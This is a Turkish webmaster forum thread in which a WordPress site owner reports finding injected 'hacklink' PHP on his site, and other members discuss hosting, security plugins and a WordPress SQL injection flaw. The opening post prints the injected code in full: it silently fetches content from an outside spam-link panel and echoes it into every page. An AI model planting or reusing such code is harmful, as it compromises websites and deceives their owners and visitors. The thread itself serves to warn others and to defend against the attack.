error_reporting(0);
$sname2 = $_SERVER['SERVER_NAME'];
$sname = str_replace(array("http://","https://","www."),null,$sname2);
$x = "http://backlinktr.biz/panelr00t/dosyalar/linkler/".$sname.".php";
if(function_exists('curl_init'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $x);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$gitt = curl_exec($ch);
curl_close($ch);
if($gitt == false){
@$gitt = file_get_contents($x);
}
}elseif(function_exists('file_get_contents')){
@$gitt = file_get_contents($x);
}
echo ''; echo $gitt; echo '';
?>
Merhaba arkadaşlar
Sitemin her gün dış bağlantılarını kontrol ederim. Bugün kontrol ettiğimde bunu buldum. Onun bunun evlatları yine bir şekilde girip link eklemişler.
Sizde dikkat edin ve kontrol edin.
Kullandığım tema vs. lisanslı güvenlik eklentileri kullanıyorum ama yinede fayda etmemiş anlaşılan.
EDİT: KONU AYLAR SONRA HORTLAMIŞ BENİM BİR SORUNUM KALMADI WP GÜNCELLEMELERİ SONRASI BU DURUM ARTIK OLMAMAYA BAŞLADI BÜYÜK İHTİMALLE BİR AÇIKLA INJECT EDİYORLARDI O AÇIK KAPANDI, AMA SİTENİZE GİREN ÇIKAN LİNKLERİ DEVAMLI KONTROL ETMENİZDE FAYDA VAR
Hacklink Buldum!! |
40 Mesajlar | 6.118 Okunma | ||
- Üyelik 02.07.2014
- Yaş/Cinsiyet 36 / E
- Meslek -
- Konum İzmir
- Ad Soyad K** K**
- Mesajlar 781
- Beğeniler 165 / 186
- Ticaret 2, (%100)
- Üyelik 06.09.2013
- Yaş/Cinsiyet 32 / E
- Meslek Cyber Sec & Project Manager
- Konum Ankara
- Ad Soyad M** G**
- Mesajlar 3356
- Beğeniler 481 / 1987
- Ticaret 10, (%100)
Merhaba
Geçmiş olsun sitenizde alt yapı wordpress mi
Geçmiş olsun sitenizde alt yapı wordpress mi
- Üyelik 06.09.2013
- Yaş/Cinsiyet 32 / E
- Meslek Cyber Sec & Project Manager
- Konum Ankara
- Ad Soyad M** G**
- Mesajlar 3356
- Beğeniler 481 / 1987
- Ticaret 10, (%100)
Mrtcn Evet hocam son sürüm wordpress. Güzelde barınıyor tema ecceplus v3 lisanslı.
Biraz ilginç olacak ama geçenlerde bi arkadaşta ecceplus teması kullanıyordu buraya konu açmıştı ve hacklink yapılmıştı onada bilinmeyen bir açıklık olabilir mi diye düşünmeye başladım.
Tekrar geçmiş olsun
- Üyelik 02.07.2014
- Yaş/Cinsiyet 36 / E
- Meslek -
- Konum İzmir
- Ad Soyad K** K**
- Mesajlar 781
- Beğeniler 165 / 186
- Ticaret 2, (%100)
Mrtcn Valla hocam yapımcıyla iletişime geçtim kesinlikle temadan olmadığını söylüyor. Ben anlamadım neden dolayı olduğunu.
AnındaHosttan Güzele geçtim Wordfence BPS gibi güvenlik eklentilerini kurdum. WP son sürüm. Bütün şifreleri zaten değiştim. Anlamıyorum yani neden oluyor.
Artık elden birşey gelmiyor günlük olarak sadece kontrol ediyorum link girilmiş mi diye.
AnındaHosttan Güzele geçtim Wordfence BPS gibi güvenlik eklentilerini kurdum. WP son sürüm. Bütün şifreleri zaten değiştim. Anlamıyorum yani neden oluyor.
Artık elden birşey gelmiyor günlük olarak sadece kontrol ediyorum link girilmiş mi diye.
- Üyelik 16.06.2011
- Yaş/Cinsiyet 31 / E
- Meslek Dijital Baskı Operatörü
- Konum Bursa
- Ad Soyad C** K**
- Mesajlar 4577
- Beğeniler 1011 / 1012
- Ticaret 3, (%100)
Hocam bu şekilde banada bulaşmıştı bir ara hacklink benim sitede anında hostinde barınıyordu hosttan şüpheleniyordum ama.. güzeldede yapıyorya wordpresste sıkıntı var haralde.
- Üyelik 03.08.2016
- Yaş/Cinsiyet 28 / E
- Meslek Aşçı
- Konum İstanbul Avrupa
- Ad Soyad A** G**
- Mesajlar 152
- Beğeniler 9 / 24
- Ticaret 0, (%0)
Hacklink oldugunu nasil anlariz acaba
- Üyelik 02.07.2014
- Yaş/Cinsiyet 36 / E
- Meslek -
- Konum İzmir
- Ad Soyad K** K**
- Mesajlar 781
- Beğeniler 165 / 186
- Ticaret 2, (%100)
melankolia Valla hocam benim hem AnındaHost aşırı yavaştı hem hacklink olayından dolayı güvenmiyordum. Her hafta hacklink yiyordum.
Güzelde ilk kez başıma geldi ama bunun host ile ilgili olduğunu düşünüyorum. Ama neyden olduğunuda bilmiyorum.
Her türlü yolu denedim. Dosyalara girilmemesi için iplere xxx bile verdim kendim bile htaccess den kaldırmadan giremiyordum. İki güvenlik eklentisi var tema orjinal.
Sanırım wordpress sıkıntılı inject filan mı yapıyorlar anlamıyorum ben.
Güzelde ilk kez başıma geldi ama bunun host ile ilgili olduğunu düşünüyorum. Ama neyden olduğunuda bilmiyorum.
Her türlü yolu denedim. Dosyalara girilmemesi için iplere xxx bile verdim kendim bile htaccess den kaldırmadan giremiyordum. İki güvenlik eklentisi var tema orjinal.
Sanırım wordpress sıkıntılı inject filan mı yapıyorlar anlamıyorum ben.
- Üyelik 02.07.2014
- Yaş/Cinsiyet 36 / E
- Meslek -
- Konum İzmir
- Ad Soyad K** K**
- Mesajlar 781
- Beğeniler 165 / 186
- Ticaret 2, (%100)
AMG61 https://wmaraci.com/link-cikartici bu linke siteni yazıp kontrol edersin. Dış linklerde tanımadığın siteler varsa yemişsindir.
- Üyelik 06.09.2013
- Yaş/Cinsiyet 32 / E
- Meslek Cyber Sec & Project Manager
- Konum Ankara
- Ad Soyad M** G**
- Mesajlar 3356
- Beğeniler 481 / 1987
- Ticaret 10, (%100)
Mrtcn Valla hocam yapımcıyla iletişime geçtim kesinlikle temadan olmadığını söylüyor. Ben anlamadım neden dolayı olduğunu.
AnındaHosttan Güzele geçtim Wordfence BPS gibi güvenlik eklentilerini kurdum. WP son sürüm. Bütün şifreleri zaten değiştim. Anlamıyorum yani neden oluyor.
Artık elden birşey gelmiyor günlük olarak sadece kontrol ediyorum link girilmiş mi diye.
AnındaHosttan Güzele geçtim Wordfence BPS gibi güvenlik eklentilerini kurdum. WP son sürüm. Bütün şifreleri zaten değiştim. Anlamıyorum yani neden oluyor.
Artık elden birşey gelmiyor günlük olarak sadece kontrol ediyorum link girilmiş mi diye.
melankolia Valla hocam benim hem AnındaHost aşırı yavaştı hem hacklink olayından dolayı güvenmiyordum. Her hafta hacklink yiyordum.
Güzelde ilk kez başıma geldi ama bunun host ile ilgili olduğunu düşünüyorum. Ama neyden olduğunuda bilmiyorum.
Her türlü yolu denedim. Dosyalara girilmemesi için iplere xxx bile verdim kendim bile htaccess den kaldırmadan giremiyordum. İki güvenlik eklentisi var tema orjinal.
Sanırım wordpress sıkıntılı inject filan mı yapıyorlar anlamıyorum ben.
Güzelde ilk kez başıma geldi ama bunun host ile ilgili olduğunu düşünüyorum. Ama neyden olduğunuda bilmiyorum.
Her türlü yolu denedim. Dosyalara girilmemesi için iplere xxx bile verdim kendim bile htaccess den kaldırmadan giremiyordum. İki güvenlik eklentisi var tema orjinal.
Sanırım wordpress sıkıntılı inject filan mı yapıyorlar anlamıyorum ben.
Wordpress 4.8.2 de SQL inj açığı bulunuyor. 4.8.3 güncellediniz mi ? Onun dışında bilinen bir zaafiyet yok, eklentileriniz ve temanızdan şüphe edin bence :)
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)